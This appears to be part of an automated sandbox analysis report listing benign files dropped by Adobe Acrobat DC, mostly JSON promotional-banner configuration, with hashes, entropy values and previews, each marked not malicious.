                            Entropy (8bit):5.366641262429402
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJM3g98kUwPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGMbLUkee9
                            MD5:8B3203DE5323059453EC58A4B9CA742C
                            SHA1:036CCA019865950BDF6681A3AB6AC77A25B450EA
                            SHA-256:4BB2997881813FE59F5F691946D1C7AF690A401577CC6E0F452F872BBE337E41
                            SHA-512:A123B17A69420D53F7B5CB5F62BD611ECBDDBAC7B0219AA015F38186F4DAA86C101827CD7EEE3D5D5A1839A607EAD5A304882D0DD850E1C88562008879B85E46
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.309585962664248
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfBoTfXpnrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGWTfXcUkee9
                            MD5:69F1543223D9FB8EC5189C32F05F0794
                            SHA1:5ECDCBFB889400CBDCCDA5DFB3AFC31FC84B4F34
                            SHA-256:2DEE2AB42F2CF5266E4FAD5154A6354F36AB50542CCB71168FCC6F6A180E50C8
                            SHA-512:5DB52C4372622ACAC03E82374F8DA7B7597B746D3102623CEAC251D194BEBEFE0F4620517F9B0F01E4273EB09DA984ED0FABCE55E53610E202560CB4D44A1D02
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.288783710633452
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfBD2G6UpnrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGR22cUkee9
                            MD5:82BB3A0CCAF6698644E8F9018357936F
                            SHA1:36CB95B4915C66A7C396D574F0AD55F1CCBDE395
                            SHA-256:8458A8D025E4F66FBF347726D53C93BF0E4C5A68C369DEA95A9D809E03992E52
                            SHA-512:F706F9C394BB9EEB1812044D0CEB28941CD6B74D97C1AE07BE6007C9549079AFD3A9B3624A326A59A82E99A44C41EAE4FE434D9B10D11CD4ECD559C6B966C946
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):285
                            Entropy (8bit):5.345649153280258
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfPmwrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGH56Ukee9
                            MD5:BD5817A743AE5E1E1A84C2404570DAAE
                            SHA1:C9FD92AA1E45AE5E25D0CB5D9EDD378CE50DC503
                            SHA-256:84A16D6AB08A8ADFF198D2875B74C50900B61978F8B6A3782A793B26BA2F2A83
                            SHA-512:73DA0C63D97E3D0113A1FEF7F4B980564EEE11EB3EAADA54DB0950DD4B1E7516C5733CEC5CD95568BAE347FB3DF6326D4B322317830D3A4F185DC2B3FE8FB93E
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1123
                            Entropy (8bit):5.691366110756918
                            Encrypted:false
                            SSDEEP:24:Yv6Xoy6oV6iApLgE9cQx8LennAvzBvkn0RCmK8czOCCS2:Yv8pvAhgy6SAFv5Ah8cv/2
                            MD5:59A2E3DDE5BA5C44767E334A7B936959
                            SHA1:DAC3B5B6157A8A613A3BA605E8DBBED82511FFC5
                            SHA-256:1DE21726F20A47F4FCC14CE2257573BFE811956F92394BFAC6636A7E459A0C79
                            SHA-512:8400D0AEFB9987B0B6E0984728FCB1F3D06FF9C40087246825FEEFE5C9F4DA338498963EF318D953504D3084DAC1980CDAD88EA281E3AB1BEE4B1654D1150334
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.292982321169806
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJf8dPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGU8Ukee9
                            MD5:6FCEDB439A9FB094384964105E5866F7
                            SHA1:56CBE65951F6AFB03DF0658BE0F41210BFEA28ED
                            SHA-256:38EAB648110C95C5A32B050CEE21F73D6081A50A80276E6BE5F35E2B374DC7D7
                            SHA-512:B8828E8B5C4B119C9AE08E5880EAF9B285B2184CC8F4C615B7BA1B9437C2C98FB8A02F84C1DA11786A8EA44DE68E27DF014F1A22275C0CFE1158FB3D4D4695CF
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):292
                            Entropy (8bit):5.293679995190487
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfQ1rPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGY16Ukee9
                            MD5:AB4D0B18BC7044C5E8E0FA8AF7DDB689
                            SHA1:21CC63ED489793C7ABEDDBB508E9DBDBD0845AFD
                            SHA-256:8A57454321B213AF552BDDF4536502A8500592C18ABCEE60BE53D14F36141887
                            SHA-512:15EE817379562D9D847A2B380B98D76B75292959DAF40E6691589DF1A56317B4D57F1526E15D309DD4AB346413297903D53F4C6087CDC6A03593301D311FF3A5
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.312443526229112
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfFldPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGz8Ukee9
                            MD5:0DF446EE7425E757FA559BE6D05D84B8
                            SHA1:68C772C29DD4BBA9A31106D4B178C4C0266942A6
                            SHA-256:F1C2C56C61CFCBF1185A9449E28DB446C60CB25D89E16C2DEC4BAC82CA6D14F9
                            SHA-512:5A287B36617B43E7A26E9447764E97DD7A6062855362E8C65EC9863B45479699D08FD8DAB87F3792930ACE1672A4D451268C57E4CBBE5CFE97DFEBCCFDEA2D8B
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
                            Entropy (8bit):5.32013864814985
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfzdPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGb8Ukee9
                            MD5:7BD384FE6D6A17578E7B88ED8B442988
                            SHA1:EF313345BAD6379BE9A71748CB3FBCEC551B37E5
                            SHA-256:9795F59492B59CF0E1A94D958E6BF93BC2F768DA1E56CD199D0EBF6C9905E4A7
                            SHA-512:9CF15F1768D17E9FBD8D936661B2CB253A05BFD78F5446DEA16903824E243916E2C8BC195596E0434032F5B301DB0DBB61561D3CFB94D712C561B63D0D1E9CE7
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):289
                            Entropy (8bit):5.300192458413344
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfYdPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGg8Ukee9
                            MD5:A66CA753DF390BFB106DB10B37BEE662
                            SHA1:FFC27F833189FB7BE5D33F741B862056049D7C2F
                            SHA-256:59AE5E7C8E148A1AA65903F07DE812546DA9C3BF55D2E812AF67B3880A6C5511
                            SHA-512:703E15B4BFAF208197FD3840110CFDD0F37E03DAFFF28B5D254DE86965A18E536A58307EDA8BE61EFD48424B092730C4A46A3A6A9AE54F987DA8D9DFB1390945
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):284
                            Entropy (8bit):5.286246219588565
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJf+dPeUkwRe9:YvXKXomN6+9N7EY5YpW7LG28Ukee9
                            MD5:F162062A8B47E9B0B26AE2DDEED5DB7F
                            SHA1:1C35EA724F96ADD596BF61C0940B2D161E1EDE4F
                            SHA-256:11D7C887F59DA308EE3161BA8BD9900F43314D1208C845F2587E52EC9BCEE16D
                            SHA-512:E04522ADDF8703E00F47B9AC75612635CD10C5FF596B1DCFC02EAF847C3C9304C533B2B9425B2F2B85FA08269DB053599EDAC65804F8AB4BE0005B44E84FD53A
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):291
                            Entropy (8bit):5.283738233348972
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfbPtdPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGDV8Ukee9
                            MD5:B6C3E3AB7542D410AB103D8683316F3D
                            SHA1:49671A560909B1372B14C7E7FB6FB64EC78AF953
                            SHA-256:23BD4A6C39CCB6C8CD6B6F7FE971EBEFD859D714A721628C36DCDE07FBBAA0AD
                            SHA-512:B6AF8AAF3804CD957DE0DBDC37296F5845906805E353214B3BCE6A14655B7A5CA2430D989B9BE173683B96EF7BFB58320461AF720A907EB11F09E3AD33623051
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):287
                            Entropy (8bit):5.284764366453812
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJf21rPeUkwRe9:YvXKXomN6+9N7EY5YpW7LG+16Ukee9
                            MD5:CFA772DE6FC3195D9142807EF0D3E209
                            SHA1:B9E5C1E3D09C669B26040D0898D0BA4F674D62E5
                            SHA-256:8E83173C0820AD263DBDD78C723EE4CB6D607B4E1EA0A181E46EDC56A3B00E6D
                            SHA-512:7EB60CDD29C9FF01692E1DFF742D4D3DA29798E1B4BC52FAA642D555F5AFE30EB62D1A055F681EDAED60F5E20285CFB071D3E50FC8CDC088E574FD442959E25E
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1090
                            Entropy (8bit):5.665550660750966
                            Encrypted:false
                            SSDEEP:24:Yv6Xoy6oV6ikamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS2:Yv8pviBgkDMUJUAh8cvM2
                            MD5:B8E7DB87B57D0688DAD2B7A698CDA490
                            SHA1:C66756284D3BECFB8C6E4B37DC4D510C81BC62B1
                            SHA-256:544C64EB70E51188D65AA63B26D1C027ED82C5E1DD873C78BA6A4A096791E163
                            SHA-512:1C9A2EC9C7116655ABAA6161F426FCF0AB0E7EB917EF739ED3BD6DD2DAFAFCD504C256181A4AB9DFA5489048B1842B2ED66AB1B2D58A7B089DB6521C667600B3
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):5.259733113179705
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfshHHrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGUUUkee9
                            MD5:C424531B08A96806326C79E2D28568FC
                            SHA1:DBBDE72A410457372F1B50367855653FF34945B0
                            SHA-256:4D8FEF02D3F099EEAF510234C51DFA3217043DFAF49EB17904ED172EF6032F16
                            SHA-512:F331A737E22194D23DBEBF94F755A80709D3538846C62E6115F5F3DAD935E074B19E90C3403C400D924B710BE974C33E178065050DF942B56BD65E843F770A6B
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.269189184576825
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJTqgFCrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGTq16Ukee9
                            MD5:BD37B250D185020FB85853804D4DFE3F
                            SHA1:7C88D579877030DD605CA4CC4099469B13463524
                            SHA-256:54387E2F31D5D175B769FB7940A5CE8C0BD9ABAABB03900CD213A57962A28497
                            SHA-512:9A72910C95CFD17C0F38603153707C8F53B21141443EAFB4F0A99C7A96582DA8512150B57313BD5A38ABEB17EF5A18108ABCE6A9F2D803E8503CB1DCF0F2253C
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):0.8112781244591328
                            Encrypted:false
                            SSDEEP:3:e:e
                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                            Malicious:false
                            Preview:....

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):2814
                            Entropy (8bit):5.1279260179189246
                            Encrypted:false
                            SSDEEP:24:Y23IyS2YVhV2LSoGIF/aM09aymwZ15i5uiaBMqg/NHJk1JEryjrCj0Sqx9Ca4ZHi:YRlVXuw/5wuiKMq8ADXrUel4xth9I
                            MD5:758815C260A148024185CEEF4E8F2685
                            SHA1:94472374C34AE8167DCEF49C137157501B0F6C5F
                            SHA-256:0AC09C5F38DD5410DF5945A5F7F9BCF87F37DF99BF448C337F457139E996880B
                            SHA-512:D8BB5316F58CF9206CE2CC0AB19CCF7A2EC426C76DFEB88FC0B0C6DD72E0033B520C8E3BB2149072F3E43A5D4A8A3858620F4CD95482A79F2D9B2996D1C0AC2C
                            Malicious:false
                            Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2a991c7ad6c34453bc58681fb536145c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1733809734000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"18deae4646178be9751dcec64e084d16","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1733809734000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"bee2b129c207b68838ff0d519e9280f8","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1733809731000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"30846590ea7b9124d0f4cfa951bcde58","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733809730000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5579f5733200df187498f638fd67d08d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733809730000},{"id":"DC_Reader_RHP_Retention","info":{"dg":"fcf39c421da9dea7b4a00c096cb9ab1e","sid":"DC_Reader_RHP_Retention"},"mimeType":"file","

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):0.9857679293408087
                            Encrypted:false
                            SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpXQMZ4zJwtNBwtNbRZ6bRZ4YQMZF:TVl2GL7ms6ggOVpXh6zutYtp6Plh7
                            MD5:8A9116E455643DE3D5ACFBC8BE50A47A
                            SHA1:6A3713F9EB3F9431C51ACA9E52CDC02DEA2480F3
                            SHA-256:E08F94B11B8F9172F502D342627A5228A05F4379156F058D243144375517A1EC
                            SHA-512:1DC30C865F108578BDE1A0147D67A291E7DB325DB9D7D8278991D780DF67EBF3795D1CC1C67AA568A47643E00E062D233372AE1AF736855C93DDFA9AB91716C7
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):8720
                            Entropy (8bit):1.3410048892843676
                            Encrypted:false
                            SSDEEP:24:7+tcnAD1RZKHs/Ds/SpXQMZPzJwtNBwtNbRZ6bRZWf1RZKwqLBx/XYKQvGJF7ure:7MUGgOVpXhhzutYtp6PMBqll2GL7msr
                            MD5:46E4CE2A9E1936DBFC48830AA09E019A
                            SHA1:94E031E62C9515F063E2728C3FC16C6D05204345
                            SHA-256:05C591A8642D931EE6BA98D4478DB1F9BF4CC11B851A1229B72512C15D681982
                            SHA-512:4BE1B997860C08DD0D969771CDF632700D54C546F08AFF45493734B154952CE0EBD97916178E4775ADD758458B0E8C0C3B23BCCD99AEC23CFA9691658CCB3A06
                            Malicious:false
                            Preview:.... .c.....z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):66726
                            Entropy (8bit):5.392739213842091
                            Encrypted:false
                            SSDEEP:768:RNOpblrU6TBH44ADKZEg7MDjxYspEOnDckS1jKd/YGP0TaaYyu:6a6TZ44ADE7MDdoOnDG1Od/1uK
                            MD5:ADEF3C136A11AA6133A8FBE1C39EC2DC
                            SHA1:F2994674EB77ED5FEC3BD6780649025EA9ADD0C0
                            SHA-256:68CA413363A44D70339C961C8A0771A830A25E589477A509BB71A67E2B2751A5
                            SHA-512:A0C4C747A79FD2BE1E1ACE01E037B2150AFD7F2739A8F43A97AC2E19454EFA54B29C6C3DDCFD27E9176B2F3ED37D9A60B292AD1FB9C301218AD50EF21A35B0C0
                            Malicious:false
